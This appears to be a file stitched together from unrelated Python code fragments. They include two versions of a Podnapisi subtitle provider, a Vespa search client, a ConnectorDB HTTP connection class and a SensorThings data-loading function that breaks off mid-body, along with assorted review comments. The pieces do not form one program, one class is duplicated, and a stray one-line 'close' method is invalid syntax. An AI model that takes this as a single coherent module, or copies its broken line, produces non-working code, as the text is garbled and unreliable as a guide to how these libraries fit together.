        """Open the HTTP session and set the provider User-Agent."""
        self.session = Session()
        # FIX: set only the UA key instead of replacing the whole headers dict,
        # which dropped requests' default headers (Accept-Encoding, Connection, ...)
        # and is inconsistent with the sibling Podnapisi provider
        self.session.headers["User-Agent"] = "Subliminal/%s" % get_version(__version__)

    def terminate(self):
        """Close the HTTP session."""
        self.session.close()

    def query(self, language, keyword, season=None, episode=None, year=None):
        """Query the provider, walking all result pages.

        :param language: subtitle language to search for.
        :param str keyword: series or movie title.
        :param season: season number (episode search only).
        :param episode: episode number (episode search only).
        :param year: optional release year.
        :return: the found subtitles, de-duplicated by pid.
        :rtype: list
        """
        # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652
        params = {"sXML": 1, "sL": str(language), "sK": keyword}
        is_episode = False
        if season and episode:
            is_episode = True
            params["sTS"] = season
            params["sTE"] = episode
        if year:
            params["sY"] = year

        # loop over paginated results
        logger.info("Searching subtitles %r", params)
        subtitles = []
        pids = set()
        while True:
            # query the server
            xml = etree.fromstring(self.session.get(self.server_url + "search/old", params=params, timeout=10).content)

            # exit if no results
            if not int(xml.find("pagination/results").text):
                logger.debug("No subtitles found")
                break

            # loop over subtitles
            for subtitle_xml in xml.findall("subtitle"):
                # read xml elements
                language = Language.fromietf(subtitle_xml.find("language").text)
                hearing_impaired = "n" in (subtitle_xml.find("flags").text or "")
                page_link = subtitle_xml.find("url").text
                pid = subtitle_xml.find("pid").text
                releases = []
                if subtitle_xml.find("release").text:
                    for release in subtitle_xml.find("release").text.split():
                        release = re.sub(r"\.+$", "", release)  # remove trailing dots
                        release = "".join(filter(lambda x: ord(x) < 128, release))  # remove non-ascii characters
                        releases.append(release)
                title = subtitle_xml.find("title").text
                season = int(subtitle_xml.find("tvSeason").text)
                episode = int(subtitle_xml.find("tvEpisode").text)
                year = int(subtitle_xml.find("year").text)

                if is_episode:
                    subtitle = PodnapisiSubtitle(
                        language,
                        hearing_impaired,
                        page_link,
                        pid,
                        releases,
                        title,
                        season=season,
                        episode=episode,
                        year=year,
                    )
                else:
                    subtitle = PodnapisiSubtitle(language, hearing_impaired, page_link, pid, releases, title, year=year)

                # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321
                if pid in pids:
                    continue

                logger.debug("Found subtitle %r", subtitle)
                subtitles.append(subtitle)
                pids.add(pid)

            # stop on last page
            if int(xml.find("pagination/current").text) >= int(xml.find("pagination/count").text):
                break

            # increment current page
            params["page"] = int(xml.find("pagination/current").text) + 1
            logger.debug("Getting page %d", params["page"])

        return subtitles

    def list_subtitles(self, video, languages):
        """List subtitles for `video` in each of `languages`."""
        if isinstance(video, Episode):
            return [
                s for l in languages
                for s in self.query(l, video.series, season=video.season, episode=video.episode, year=video.year)
            ]
        elif isinstance(video, Movie):
            return [s for l in languages for s in self.query(l, video.title, year=video.year)]

    def download_subtitle(self, subtitle):
        """Download `subtitle` as a single-file zip and store its content."""
        # download as a zip
        # FIX: the %r placeholder had no argument, which logged the literal "%r"
        logger.info("Downloading subtitle %r", subtitle)
        r = self.session.get(self.server_url + subtitle.pid + "/download", params={"container": "zip"}, timeout=10)
        r.raise_for_status()

        # open the zip
        with ZipFile(io.BytesIO(r.content)) as zf:
            if len(zf.namelist()) > 1:
                raise ProviderError("More than one file to unzip")

            subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class PodnapisiProvider(Provider):
    """Podnapisi Provider."""
    languages = ({Language('por', 'BR'), Language('srp', script='Latn')} | {
        Language.fromalpha2(l)
        for l in language_converters['alpha2'].codes
    })
    server_url = 'http://podnapisi.net/subtitles/'
    subtitle_class = PodnapisiSubtitle

    def initialize(self):
        """Open the HTTP session and set the provider User-Agent."""
        self.session = Session()
        self.session.headers[
            'User-Agent'] = 'Subliminal/%s' % __short_version__

    def terminate(self):
        """Close the HTTP session."""
        self.session.close()

    def query(self, language, keyword, season=None, episode=None, year=None):
        """Query the provider, walking all result pages and de-duplicating by pid.

        :param language: subtitle language to search for.
        :param str keyword: series or movie title.
        :param season: season number (episode search only).
        :param episode: episode number (episode search only).
        :param year: optional release year.
        :return: the found subtitles.
        :rtype: list
        """
        # set parameters, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164#p212652
        params = {'sXML': 1, 'sL': str(language), 'sK': keyword}
        is_episode = False
        if season and episode:
            is_episode = True
            params['sTS'] = season
            params['sTE'] = episode
        if year:
            params['sY'] = year

        # loop over paginated results
        logger.info('Searching subtitles %r', params)
        subtitles = []
        pids = set()
        while True:
            # query the server
            xml = etree.fromstring(
                self.session.get(self.server_url + 'search/old',
                                 params=params,
                                 timeout=10).content)

            # exit if no results
            if not int(xml.find('pagination/results').text):
                logger.debug('No subtitles found')
                break

            # loop over subtitles
            # NOTE: the loop variables below deliberately re-bind the method
            # parameters (language/season/episode/year) to each result's values
            for subtitle_xml in xml.findall('subtitle'):
                # read xml elements
                language = Language.fromietf(
                    subtitle_xml.find('language').text)
                hearing_impaired = 'n' in (subtitle_xml.find('flags').text
                                           or '')
                page_link = subtitle_xml.find('url').text
                pid = subtitle_xml.find('pid').text
                releases = []
                if subtitle_xml.find('release').text:
                    for release in subtitle_xml.find('release').text.split():
                        release = re.sub(r'\.+$', '',
                                         release)  # remove trailing dots
                        release = ''.join(
                            filter(lambda x: ord(x) < 128,
                                   release))  # remove non-ascii characters
                        releases.append(release)
                title = subtitle_xml.find('title').text
                season = int(subtitle_xml.find('tvSeason').text)
                episode = int(subtitle_xml.find('tvEpisode').text)
                year = int(subtitle_xml.find('year').text)

                if is_episode:
                    subtitle = self.subtitle_class(language,
                                                   hearing_impaired,
                                                   page_link,
                                                   pid,
                                                   releases,
                                                   title,
                                                   season=season,
                                                   episode=episode,
                                                   year=year)
                else:
                    subtitle = self.subtitle_class(language,
                                                   hearing_impaired,
                                                   page_link,
                                                   pid,
                                                   releases,
                                                   title,
                                                   year=year)

                # ignore duplicates, see http://www.podnapisi.net/forum/viewtopic.php?f=62&t=26164&start=10#p213321
                if pid in pids:
                    continue

                logger.debug('Found subtitle %r', subtitle)
                subtitles.append(subtitle)
                pids.add(pid)

            # stop on last page
            if int(xml.find('pagination/current').text) >= int(
                    xml.find('pagination/count').text):
                break

            # increment current page
            params['page'] = int(xml.find('pagination/current').text) + 1
            logger.debug('Getting page %d', params['page'])

        return subtitles

    def list_subtitles(self, video, languages):
        """List subtitles for `video` in each of `languages`."""
        if isinstance(video, Episode):
            return [
                s for l in languages for s in self.query(l,
                                                         video.series,
                                                         season=video.season,
                                                         episode=video.episode,
                                                         year=video.year)
            ]
        elif isinstance(video, Movie):
            return [
                s for l in languages
                for s in self.query(l, video.title, year=video.year)
            ]

    def download_subtitle(self, subtitle):
        """Download `subtitle` as a single-file zip and store its content."""
        # download as a zip
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + subtitle.pid + '/download',
                             params={'container': 'zip'},
                             timeout=10)
        r.raise_for_status()

        # open the zip
        with ZipFile(io.BytesIO(r.content)) as zf:
            if len(zf.namelist()) > 1:
                raise ProviderError('More than one file to unzip')

            subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
def close(self): requestsSession.close(self) self.pool.stop()
class Vespa(object):
    """Client for a deployed Vespa application.

    Wraps a persistent ``requests`` session (with retries) and exposes
    query, feed, get, update and delete operations plus training-data
    collection and evaluation helpers.
    """

    def __init__(
        self,
        url: str,
        port: Optional[int] = None,
        deployment_message: Optional[List[str]] = None,
        cert: Optional[str] = None,
        output_file: IO = sys.stdout,
    ) -> None:
        """
        Establish a connection with a Vespa application.

        :param url: Vespa instance URL.
        :param port: Vespa instance port.
        :param deployment_message: Message returned by Vespa engine after deployment. Used internally by deploy methods.
        :param cert: Path to certificate and key file.
        :param output_file: Output file to write output messages.

        >>> Vespa(url = "https://cord19.vespa.ai")  # doctest: +SKIP

        >>> Vespa(url = "http://localhost", port = 8080)
        Vespa(http://localhost, 8080)

        >>> Vespa(url = "https://api.vespa-external.aws.oath.cloud", port = 4443, cert = "/path/to/cert-and-key.pem")  # doctest: +SKIP
        """
        self.output_file = output_file
        self.url = url
        self.port = port
        self.deployment_message = deployment_message
        self.cert = cert
        self.http_session = None
        # Endpoint is url as-is when no port is given, otherwise "url:port"
        # with any trailing slash stripped first.
        if port is None:
            self.end_point = self.url
        else:
            self.end_point = str(url).rstrip("/") + ":" + str(port)
        self.search_end_point = self.end_point + "/search/"
        # Session is opened eagerly at construction time.
        self._open_http_session()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Context-manager exit closes the HTTP session.
        self.close()

    def asyncio(self):
        """Return an async wrapper around this application."""
        return VespaAsync(self)

    def _open_http_session(self):
        # Idempotent: reuse an already-open session.
        if self.http_session is not None:
            return

        # NOTE(review): ``retry_strategy`` is a module-level object defined
        # outside this chunk — confirm its configuration there.
        adapter = HTTPAdapter(max_retries=retry_strategy)
        self.http_session = Session()
        self.http_session.mount("https://", adapter)
        self.http_session.mount("http://", adapter)
        return self.http_session

    def _close_http_session(self):
        # No-op when the session was never opened or already cleared.
        if self.http_session is None:
            return
        self.http_session.close()

    def close(self):
        """Close the underlying HTTP session."""
        self._close_http_session()

    def __repr__(self):
        if self.port:
            return "Vespa({}, {})".format(self.url, self.port)
        else:
            return "Vespa({})".format(self.url)

    def get_application_status(self) -> Optional[Response]:
        """
        Get application status.

        :return: the raw HTTP response, or None if the connection failed.
        """
        end_point = "{}/ApplicationStatus".format(self.end_point)
        try:
            response = self.http_session.get(end_point, cert=self.cert)
        except ConnectionError:
            response = None
        return response

    def _build_query_body(self,
                          query: Optional[str] = None,
                          query_model: Optional[QueryModel] = None,
                          recall: Optional[Tuple] = None,
                          **kwargs) -> Dict:
        """Build the request body from a query string and query model.

        ``recall`` is a (field_name, [values]) tuple turned into a Vespa
        recall expression; extra kwargs are merged into the body verbatim.
        """
        # NOTE(review): asserts are stripped under ``python -O`` — these
        # validations would silently disappear; consider raising instead.
        assert query is not None, "No 'query' specified."
        assert query_model is not None, "No 'query_model' specified."
        body = query_model.create_body(query=query)
        if recall is not None:
            body.update({
                "recall": "+(" + " ".join(
                    ["{}:{}".format(recall[0], str(doc)) for doc in recall[1]]) + ")"
            })
        body.update(kwargs)
        return body

    def query(self,
              body: Optional[Dict] = None,
              query: Optional[str] = None,
              query_model: Optional[QueryModel] = None,
              debug_request: bool = False,
              recall: Optional[Tuple] = None,
              **kwargs) -> VespaQueryResponse:
        """
        Send a query request to the Vespa application.

        Either send 'body' containing all the request parameters or specify 'query' and 'query_model'.

        :param body: Dict containing all the request parameters.
        :param query: Query string
        :param query_model: Query model
        :param debug_request: return request body for debugging instead of sending the request.
        :param recall: Tuple of size 2 where the first element is the name of the field to use to recall and the
            second element is a list of the values to be recalled.
        :param kwargs: Additional parameters to be sent along the request.
        :return: Either the request body if debug_request is True or the result from the Vespa application
        """
        # An explicit body wins; otherwise it is built from query/query_model.
        body = (self._build_query_body(query, query_model, recall, **kwargs)
                if body is None else body)
        if debug_request:
            return VespaQueryResponse(json={},
                                      status_code=None,
                                      url=None,
                                      request_body=body)
        else:
            r = self.http_session.post(self.search_end_point,
                                       json=body,
                                       cert=self.cert)
            return VespaQueryResponse(json=r.json(),
                                      status_code=r.status_code,
                                      url=str(r.url))

    def feed_data_point(self, schema: str, data_id: str,
                        fields: Dict) -> VespaResponse:
        """
        Feed a data point to a Vespa app.

        :param schema: The schema that we are sending data to.
        :param data_id: Unique id associated with this data point.
        :param fields: Dict containing all the fields required by the `schema`.
        :return: Response of the HTTP POST request.
        """
        end_point = "{}/document/v1/{}/{}/docid/{}".format(
            self.end_point, schema, schema, str(data_id))
        vespa_format = {"fields": fields}
        response = self.http_session.post(end_point,
                                          json=vespa_format,
                                          cert=self.cert)
        return VespaResponse(
            json=response.json(),
            status_code=response.status_code,
            url=str(response.url),
            operation_type="feed",
        )

    def _feed_batch_sync(self, schema: str, batch: List[Dict]):
        # Sequential feed; one HTTP request per data point.
        return [
            self.feed_data_point(schema, data_point["id"],
                                 data_point["fields"]) for data_point in batch
        ]

    async def _feed_batch_async(self, schema: str, batch: List[Dict]):
        # Delegates to the async client for concurrent feeding.
        async with VespaAsync(self) as async_app:
            return await async_app.feed_batch(schema=schema, batch=batch)

    def feed_batch(self, schema: str, batch: List[Dict], asynchronous=False):
        """
        Feed a batch of data to a Vespa app.

        :param schema: The schema that we are sending data to.
        :param batch: A list of dict containing the keys 'id' and 'fields' to be used in the
            :func:`feed_data_point`.
        :param asynchronous: Set True to send data in async mode. Default to False. Create and execute the coroutine
            if there is no active running loop. Otherwise it returns the coroutine and requires await to be executed.
        :return: List of HTTP POST responses
        """
        if asynchronous:
            # If a loop is already running we cannot call asyncio.run; hand
            # the coroutine back to the caller to await.
            try:
                _ = asyncio.get_running_loop()
                return self._feed_batch_async(schema=schema, batch=batch)
            except RuntimeError:
                return asyncio.run(
                    self._feed_batch_async(schema=schema, batch=batch))
        else:
            return self._feed_batch_sync(schema=schema, batch=batch)

    def delete_data(self, schema: str, data_id: str) -> VespaResponse:
        """
        Delete a data point from a Vespa app.

        :param schema: The schema that we are deleting data from.
        :param data_id: Unique id associated with this data point.
        :return: Response of the HTTP DELETE request.
        """
        end_point = "{}/document/v1/{}/{}/docid/{}".format(
            self.end_point, schema, schema, str(data_id))
        response = self.http_session.delete(end_point, cert=self.cert)
        return VespaResponse(
            json=response.json(),
            status_code=response.status_code,
            url=str(response.url),
            operation_type="delete",
        )

    def delete_batch(self, batch: List):
        """
        Async delete a batch of data from a Vespa app.

        :param batch: A list of tuples with 'schema' and 'id'
        :return: list of :func:`delete_data` responses, one per tuple.
        """
        return [self.delete_data(schema, id) for schema, id in batch]

    def delete_all_docs(self, content_cluster_name: str,
                        schema: str) -> Response:
        """
        Delete all documents associated with the schema

        :param content_cluster_name: Name of content cluster to GET from, or visit.
        :param schema: The schema that we are deleting data from.
        :return: Response of the HTTP DELETE request.
        """
        end_point = "{}/document/v1/{}/{}/docid/?cluster={}&selection=true".format(
            self.end_point, schema, schema, content_cluster_name)
        response = self.http_session.delete(end_point, cert=self.cert)
        return response

    def get_data(self, schema: str, data_id: str) -> VespaResponse:
        """
        Get a data point from a Vespa app.

        :param schema: The schema that we are getting data from.
        :param data_id: Unique id associated with this data point.
        :return: Response of the HTTP GET request.
        """
        end_point = "{}/document/v1/{}/{}/docid/{}".format(
            self.end_point, schema, schema, str(data_id))
        response = self.http_session.get(end_point, cert=self.cert)
        return VespaResponse(
            json=response.json(),
            status_code=response.status_code,
            url=str(response.url),
            operation_type="get",
        )

    def get_batch(self, batch: List):
        """
        Async get a batch of data from a Vespa app.

        :param batch: A list of tuples with 'schema' and 'id'.
        :return: list of :func:`get_data` responses, one per tuple.
        """
        return [self.get_data(schema, id) for schema, id in batch]

    def update_data(self,
                    schema: str,
                    data_id: str,
                    fields: Dict,
                    create: bool = False) -> VespaResponse:
        """
        Update a data point in a Vespa app.

        :param schema: The schema that we are updating data.
        :param data_id: Unique id associated with this data point.
        :param fields: Dict containing all the fields you want to update.
        :param create: If true, updates to non-existent documents will create an empty document to update
        :return: Response of the HTTP PUT request.
        """
        end_point = "{}/document/v1/{}/{}/docid/{}?create={}".format(
            self.end_point, schema, schema, str(data_id), str(create).lower())
        # Each field value is wrapped in Vespa's partial-update "assign" form.
        vespa_format = {
            "fields": {k: {
                "assign": v
            } for k, v in fields.items()}
        }
        response = self.http_session.put(end_point,
                                         json=vespa_format,
                                         cert=self.cert)
        return VespaResponse(
            json=response.json(),
            status_code=response.status_code,
            url=str(response.url),
            operation_type="update",
        )

    def update_batch(self, batch: List):
        """
        Update a batch of data points.

        :param batch: A list of tuples with 'schema', 'id', 'fields', and 'create'
        :return: list of :func:`update_data` responses, one per tuple.
        """
        return [
            self.update_data(schema, id, fields, create)
            for schema, id, fields, create in batch
        ]

    @staticmethod
    def annotate_data(hits, query_id, id_field, relevant_id, fields,
                      relevant_score, default_score):
        """Turn raw hits into flat labelled records.

        Each hit becomes a dict with document_id, query_id, a label
        (relevant_score if the hit's id matches relevant_id, else
        default_score) and the requested fields (dict-valued fields are
        flattened into the record).
        """
        data = []
        for h in hits:
            record = {}
            record.update({"document_id": h["fields"][id_field]})
            record.update({"query_id": query_id})
            record.update({
                "label":
                relevant_score
                if h["fields"][id_field] == relevant_id else default_score
            })
            for field in fields:
                field_value = h["fields"].get(field, None)
                if field_value:
                    if isinstance(field_value, dict):
                        record.update(field_value)
                    else:
                        record.update({field: field_value})
            data.append(record)
        return data

    def collect_training_data_point(self,
                                    query: str,
                                    query_id: str,
                                    relevant_id: str,
                                    id_field: str,
                                    query_model: QueryModel,
                                    number_additional_docs: int,
                                    fields: List[str],
                                    relevant_score: int = 1,
                                    default_score: int = 0,
                                    **kwargs) -> List[Dict]:
        """
        Collect training data based on a single query

        :param query: Query string.
        :param query_id: Query id represented as str.
        :param relevant_id: Relevant id represented as a str.
        :param id_field: The Vespa field representing the document id.
        :param query_model: Query model.
        :param number_additional_docs: Number of additional documents to retrieve for each relevant document.
        :param fields: Which fields should be retrieved.
        :param relevant_score: Score to assign to relevant documents. Default to 1.
        :param default_score: Score to assign to the additional documents that are not relevant. Default to 0.
        :param kwargs: Extra keyword arguments to be included in the Vespa Query.
        :return: List of dicts containing the document id (document_id), query id (query_id), scores (relevant)
            and vespa rank features returned by the Query model RankProfile used.
        """
        # First recall only the known-relevant document.
        relevant_id_result = self.query(query=query,
                                        query_model=query_model,
                                        recall=(id_field, [relevant_id]),
                                        **kwargs)
        hits = relevant_id_result.hits
        features = []
        # Only proceed when the relevant document was actually recalled;
        # otherwise an empty list is returned.
        if len(hits) == 1 and hits[0]["fields"][id_field] == relevant_id:
            if number_additional_docs > 0:
                # Fetch extra (presumed non-relevant) documents for contrast.
                random_hits_result = self.query(query=query,
                                                query_model=query_model,
                                                hits=number_additional_docs,
                                                **kwargs)
                hits.extend(random_hits_result.hits)

            features = self.annotate_data(
                hits=hits,
                query_id=query_id,
                id_field=id_field,
                relevant_id=relevant_id,
                fields=fields,
                relevant_score=relevant_score,
                default_score=default_score,
            )
        return features

    def collect_training_data(self,
                              labeled_data: List[Dict],
                              id_field: str,
                              query_model: QueryModel,
                              number_additional_docs: int,
                              relevant_score: int = 1,
                              default_score: int = 0,
                              show_progress: Optional[int] = None,
                              **kwargs) -> DataFrame:
        """
        Collect training data based on a set of labelled data.

        :param labeled_data: Labelled data containing query, query_id and relevant ids.
        :param id_field: The Vespa field representing the document id.
        :param query_model: Query model.
        :param number_additional_docs: Number of additional documents to retrieve for each relevant document.
        :param relevant_score: Score to assign to relevant documents. Default to 1.
        :param default_score: Score to assign to the additional documents that are not relevant. Default to 0.
        :param show_progress: Prints the the current point being collected every `show_progress` step. Default to None,
            in which case progress is not printed.
        :param kwargs: Extra keyword arguments to be included in the Vespa Query.
        :return: DataFrame containing document id (document_id), query id (query_id), scores (relevant)
            and vespa rank features returned by the Query model RankProfile used.
        """
        training_data = []
        number_queries = len(labeled_data)
        idx_total = 0
        for query_idx, query_data in enumerate(labeled_data):
            number_relevant_docs = len(query_data["relevant_docs"])
            for doc_idx, doc_data in enumerate(query_data["relevant_docs"]):
                idx_total += 1
                if (show_progress is not None) and (idx_total % show_progress
                                                    == 0):
                    print(
                        "Query {}/{}, Doc {}/{}. Query id: {}. Doc id: {}".
                        format(
                            query_idx,
                            number_queries,
                            doc_idx,
                            number_relevant_docs,
                            query_data["query_id"],
                            doc_data["id"],
                        ),
                        file=self.output_file,
                    )
                training_data_point = self.collect_training_data_point(
                    query=query_data["query"],
                    query_id=query_data["query_id"],
                    relevant_id=doc_data["id"],
                    id_field=id_field,
                    query_model=query_model,
                    number_additional_docs=number_additional_docs,
                    relevant_score=doc_data.get("score", relevant_score),
                    default_score=default_score,
                    **kwargs)
                training_data.extend(training_data_point)
        training_data = DataFrame.from_records(training_data)
        return training_data

    def evaluate_query(self,
                       eval_metrics: List[EvalMetric],
                       query_model: QueryModel,
                       query_id: str,
                       query: str,
                       id_field: str,
                       relevant_docs: List[Dict],
                       default_score: int = 0,
                       detailed_metrics=False,
                       **kwargs) -> Dict:
        """
        Evaluate a query according to evaluation metrics

        :param eval_metrics: A list of evaluation metrics.
        :param query_model: Query model.
        :param query_id: Query id represented as str.
        :param query: Query string.
        :param id_field: The Vespa field representing the document id.
        :param relevant_docs: A list with dicts where each dict contains a doc id a optionally a doc score.
        :param default_score: Score to assign to the additional documents that are not relevant. Default to 0.
        :param detailed_metrics: Return intermediate computations if available.
        :param kwargs: Extra keyword arguments to be included in the Vespa Query.
        :return: Dict containing query_id and metrics according to the selected evaluation metrics.
        """
        query_results = self.query(query=query,
                                   query_model=query_model,
                                   **kwargs)
        evaluation = {"model": query_model.name, "query_id": query_id}
        for evaluator in eval_metrics:
            evaluation.update(
                evaluator.evaluate_query(
                    query_results,
                    relevant_docs,
                    id_field,
                    default_score,
                    detailed_metrics,
                ))
        return evaluation

    def evaluate(self,
                 labeled_data: Union[List[Dict], DataFrame],
                 eval_metrics: List[EvalMetric],
                 query_model: Union[QueryModel, List[QueryModel]],
                 id_field: str,
                 default_score: int = 0,
                 detailed_metrics=False,
                 per_query=False,
                 aggregators=None,
                 **kwargs) -> DataFrame:
        """
        Evaluate a :class:`QueryModel` according to a list of :class:`EvalMetric`.

        labeled_data can be a DataFrame or a List of Dict:

        >>> labeled_data_df = DataFrame(
        ...     data={
        ...         "qid": [0, 0, 1, 1],
        ...         "query": ["Intrauterine virus infections and congenital heart disease", "Intrauterine virus infections and congenital heart disease", "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus", "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus"],
        ...         "doc_id": [0, 3, 1, 5],
        ...         "relevance": [1,1,1,1]
        ...     }
        ... )

        >>> labeled_data = [
        ...     {
        ...         "query_id": 0,
        ...         "query": "Intrauterine virus infections and congenital heart disease",
        ...         "relevant_docs": [{"id": 0, "score": 1}, {"id": 3, "score": 1}]
        ...     },
        ...     {
        ...         "query_id": 1,
        ...         "query": "Clinical and immunologic studies in identical twins discordant for systemic lupus erythematosus",
        ...         "relevant_docs": [{"id": 1, "score": 1}, {"id": 5, "score": 1}]
        ...     }
        ... ]

        :param labeled_data: Labelled data containing query, query_id and relevant ids. See details about data format.
        :param eval_metrics: A list of evaluation metrics.
        :param query_model: Accept a Query model or a list of Query Models.
        :param id_field: The Vespa field representing the document id.
        :param default_score: Score to assign to the additional documents that are not relevant. Default to 0.
        :param detailed_metrics: Return intermediate computations if available.
        :param per_query: Set to True to return evaluation metrics per query.
        :param aggregators: Used only if `per_query=False`. List of pandas friendly aggregators to summarize per model
            metrics. We use ["mean", "median", "std"] by default.
        :param kwargs: Extra keyword arguments to be included in the Vespa Query.
        :return: DataFrame containing query_id and metrics according to the selected evaluation metrics.
        """
        if isinstance(labeled_data, DataFrame):
            labeled_data = parse_labeled_data(df=labeled_data)
        if isinstance(query_model, QueryModel):
            query_model = [query_model]
        model_names = [model.name for model in query_model]
        # NOTE(review): assert is stripped under ``python -O``; consider
        # raising ValueError for the duplicate-name check instead.
        assert len(model_names) == len(set(
            model_names)), "Duplicate model names. Choose unique model names."
        evaluation = []
        for query_data in labeled_data:
            for model in query_model:
                evaluation_query = self.evaluate_query(
                    eval_metrics=eval_metrics,
                    query_model=model,
                    query_id=query_data["query_id"],
                    query=query_data["query"],
                    id_field=id_field,
                    relevant_docs=query_data["relevant_docs"],
                    default_score=default_score,
                    detailed_metrics=detailed_metrics,
                    **kwargs)
                evaluation.append(evaluation_query)
        evaluation = DataFrame.from_records(evaluation)
        if not per_query:
            if not aggregators:
                aggregators = ["mean", "median", "std"]
            # Aggregate metrics per model; transpose so metrics are rows.
            evaluation = (evaluation[[
                x for x in evaluation.columns if x != "query_id"
            ]].groupby(by="model").agg(aggregators).T)
        return evaluation
class DatabaseConnection(object):
    """HTTP/websocket connection to a ConnectorDB server.

    Wraps a shared ``requests`` session (CRUD API) and a websocket handler
    (subscriptions) behind one object.
    """

    def __init__(self, user_or_apikey=None, user_password=None,
                 url="https://connectordb.com"):
        # Set up the API URL (scheme and trailing slash are normalized)
        if not url.startswith("http"):
            url = "https://" + url
        if not url.endswith("/"):
            url = url + "/"
        self.baseurl = url
        self.url = urljoin(url, "/api/v1/")

        # Set up a session, which allows us to reuse connections
        self.r = Session()
        self.r.headers.update({'content-type': 'application/json'})

        # Prepare the websocket
        self.ws = WebsocketHandler(self.url, None)

        # Set the authentication if any
        self.setauth(user_or_apikey, user_password)

        # Now set up the login path so we know what we're logged in as.
        # With a password we can derive it; with an apikey we must ask the
        # server (ping performs a network round trip here).
        if user_password is not None:
            self.path = user_or_apikey + "/user"
        else:
            self.path = self.ping()

    def setauth(self, user_or_apikey=None, user_password=None):
        """ setauth sets the authentication header for use in the session.
        It is for use when apikey is updated or something of the sort, such that
        there is a seamless experience. """
        auth = None
        if user_or_apikey is not None:
            # ConnectorDB allows login using both basic auth or an apikey url param.
            # The python client uses basic auth for all logins
            if user_password is None:
                # Login by api key - the basic auth login uses "" user and
                # apikey as password
                user_password = user_or_apikey
                user_or_apikey = ""
            auth = HTTPBasicAuth(user_or_apikey, user_password)
            self.r.auth = auth

        # Set the websocket's authentication
        self.ws.setauth(auth)

    def close(self):
        """Closes the active connections to ConnectorDB"""
        self.r.close()

    def handleresult(self, r):
        """Handles HTTP error codes for the given request

        Raises:
            AuthenticationError on the appropriate 4** errors
            ServerError if the response is not an ok (2**)

        Arguments:
            r -- The request result
        """
        if r.status_code >= 400 and r.status_code < 500:
            msg = r.json()
            raise AuthenticationError(
                str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")")
        # NOTE(review): ``> 300`` lets status 300 itself pass as success and
        # treats redirects as errors — presumably ``>= 300`` or ``>= 400``
        # was intended; confirm against the server's behavior.
        elif r.status_code > 300:
            err = None
            try:
                msg = r.json()
                err = ServerError(
                    str(msg["code"]) + ": " + msg["msg"] + " (" + msg["ref"] + ")")
            # NOTE(review): bare except also catches KeyboardInterrupt /
            # SystemExit; narrowing to (ValueError, KeyError) would be safer.
            except:
                raise ServerError(
                    "Server returned error, but did not give a valid error message")
            raise err
        return r

    def ping(self):
        """Attempts to ping the server using current credentials, and responds with the path of the currently
        authenticated device"""
        return self.handleresult(self.r.get(self.url,
                                            params={"q": "this"})).text

    def query(self, query_type, query=None):
        """Run the given query on the connection (POST request to /query)"""
        return self.handleresult(self.r.post(urljoin(self.url + "query/",
                                                     query_type),
                                             data=json.dumps(query))).json()

    def create(self, path, data=None):
        """Send a POST CRUD API request to the given path using the given data which will be converted
        to json"""
        return self.handleresult(self.r.post(urljoin(self.url + CRUD_PATH,
                                                     path),
                                             data=json.dumps(data)))

    def read(self, path, params=None):
        """Read the result at the given path (GET) from the CRUD API, using the optional params dictionary
        as url parameters."""
        return self.handleresult(self.r.get(urljoin(self.url + CRUD_PATH,
                                                    path),
                                            params=params))

    def update(self, path, data=None):
        """Send an update request to the given path of the CRUD API, with the given data dict, which will be converted
        into json"""
        return self.handleresult(self.r.put(urljoin(self.url + CRUD_PATH,
                                                    path),
                                            data=json.dumps(data)))

    def delete(self, path):
        """Send a delete request to the given path of the CRUD API. This deletes the object. Or at least tries to."""
        return self.handleresult(self.r.delete(urljoin(self.url + CRUD_PATH,
                                                       path)))

    def get(self, path, params=None):
        """Sends a get request to the given path in the database and with optional URL parameters"""
        return self.handleresult(self.r.get(urljoin(self.url, path),
                                            params=params))

    def subscribe(self, stream, callback, transform=""):
        """Subscribe to the given stream with the callback"""
        return self.ws.subscribe(stream, callback, transform)

    def unsubscribe(self, stream, transform=""):
        """Unsubscribe from the given stream"""
        return self.ws.unsubscribe(stream, transform)

    def wsdisconnect(self):
        """Disconnects the websocket"""
        self.ws.disconnect()
def _load(self, offset=0, limit=10, resulttype='results',
          identifier=None, bbox=None, datetime_=None, properties=None,
          sortby=None, select_properties=None, skip_geometry=False, q=None):
    """
    Private function: Load STA data

    :param offset: starting record to return (default 0)
    :param limit: number of records to return (default 10)
    :param resulttype: return results or hit limit (default results)
    :param identifier: feature id (single-feature request)
    :param bbox: bounding box [minx,miny,maxx,maxy]
    :param datetime_: temporal (datestamp or extent)
    :param properties: list of tuples (name, value)
    :param sortby: list of dicts (property, order)
    :param select_properties: list of property names
    :param skip_geometry: bool of whether to skip geometry (default False)
    :param q: full-text search term(s)

    :returns: dict of GeoJSON FeatureCollection (or a single feature when
              `identifier` is given)
    """
    # Resolve mutable defaults here rather than in the signature so a single
    # list object is not shared across calls (classic Python pitfall).
    bbox = [] if bbox is None else bbox
    properties = [] if properties is None else properties
    sortby = [] if sortby is None else sortby
    select_properties = [] if select_properties is None else select_properties

    feature_collection = {'type': 'FeatureCollection', 'features': []}

    # Make params
    params = {
        '$expand': EXPAND[self.entity],
        '$skip': str(offset),
        '$top': str(limit),
        '$count': 'true'
    }
    if properties or bbox or datetime_:
        params['$filter'] = self._make_filter(properties, bbox, datetime_)
    if sortby:
        params['$orderby'] = self._make_orderby(sortby)

    # Use the session as a context manager so it is closed even when an
    # exception is raised mid-request (the original leaked it on errors).
    with Session() as s:
        # Form URL for GET request
        LOGGER.debug('Sending query')
        if identifier:
            r = s.get(f'{self._url}({identifier})', params=params)
        else:
            r = s.get(self._url, params=params)

        if r.status_code == codes.bad:
            LOGGER.error('Bad http response code')
            raise ProviderConnectionError('Bad http response code')
        response = r.json()

        # if hits, return count
        if resulttype == 'hits':
            LOGGER.debug('Returning hits')
            feature_collection['numberMatched'] = response.get('@iot.count')
            return feature_collection

        # Query if values are less than expected; follow @iot.nextLink
        # pagination until we have enough values or the links run out.
        v = [response, ] if identifier else response.get('value')
